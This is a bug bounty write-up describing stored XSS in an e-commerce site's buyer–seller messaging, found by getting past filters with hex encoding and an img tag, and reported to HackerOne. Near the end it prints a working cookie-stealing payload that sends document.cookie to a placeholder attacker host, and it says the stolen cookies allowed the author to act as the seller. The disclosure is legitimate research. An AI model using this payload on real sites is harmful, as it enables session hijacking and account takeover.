Today, I’m gonna share my story of an interesting XSS that I found on the same website that’s “redacted.com”. Since it was an e-commerce website, it had a feature where buyers and sellers can contact each other by sending messages. It seemed interesting to me and I decided to test it for XSS.
I made two accounts, one as a buyer and another as a seller. I started with sending “<>” to my seller’s account to see if these tags are being HTML encoded or not. To my surprise, the filter didn’t encode it. I decided to use the most powerful payload of all time,
As I typed the complete payload in the text box, an alert popped up. I was happy.
My Mind: Oh! That was a piece of cake.
As I clicked send, BOOM! I got an error. I was wondering why did it happen. I thought it to be some client-side filter which is preventing the XSS payload to be sent. I tried to bypass the client-side filter using Burpsuite but hard luck! Then, I tried sending <script> and alert() separately to see what actually is being prevented by the filter. It didn’t allow me to send either. I tried using prompt() instead of alert() to bypass the filter but again, hard luck. I moved on to hex encode it and this time I got success. I escaped the filter using hex encoding. I made another payload, hoping success this time.
YES! It escaped the filter! I quickly went to my seller’s account to see if I got an alert there.
Wait! What? No alert there. I checked the source and saw that the “onerror=[hex encoded payload]” got truncated, only <img src=x> was left. I was like:
I tried all possible ways to trigger alert but got no success at all. The filter was working way better than I expected. It was becoming really frustrating since almost everything was being filtered that was necessary to popup an alert. I really lost hope that I would get XSS there. The alert that popped up when I typed the payload in the text box was also of no use, since it was a Self Reflected XSS. I decided to take a break and go out for a walk.
My fate to my mind:
While walking, I was continuously thinking about it. It was the time to think out of the box since, I tried every possible way inside the box. Suddenly, a thought came in my mind that what the hell was I going to do with an alert, since an alert is just a confirmation. I thought that instead of trying to trigger an alert, I should actually try to demonstrate the impact of the same. At the same time, an alert triggered in my mind that <img src=x> got escaped when I tried to send the hex encoded payload. It got my nerves.
I came back with uprising hopes and tried sending <img src=x> to check if it’s working or not. Yes, it’s working. I quickly replaced x with a valid URL and saw that the image got rendered in the message box of seller. At that moment, I was not interested in triggering an alert at all. I decided to demonstrate how an attacker can steal cookies of sellers and other buyers using it. I went to my text editor, coded few lines in PHP to steal cookies and uploaded it to a free web hosting.
I made my final payload to request the PHP script that I uploaded on web hosting service so that I can steal cookies of the seller.
<img src=x onerror=“this.src=‘https://[your-webhosting]/steal.php?cookie=’+document.cookie”>
I quickly switched to my seller’s account and YES! The payload finally worked. I got the cookies! I tried to perform actions on the behalf of seller by replacing the cookies and WOAH! It worked.
I was like:
- June 03: Reported it to the HackerOne Team.
- June 03: Triaged
- Severity: High(8.1)
- Bounty: Still Waiting xD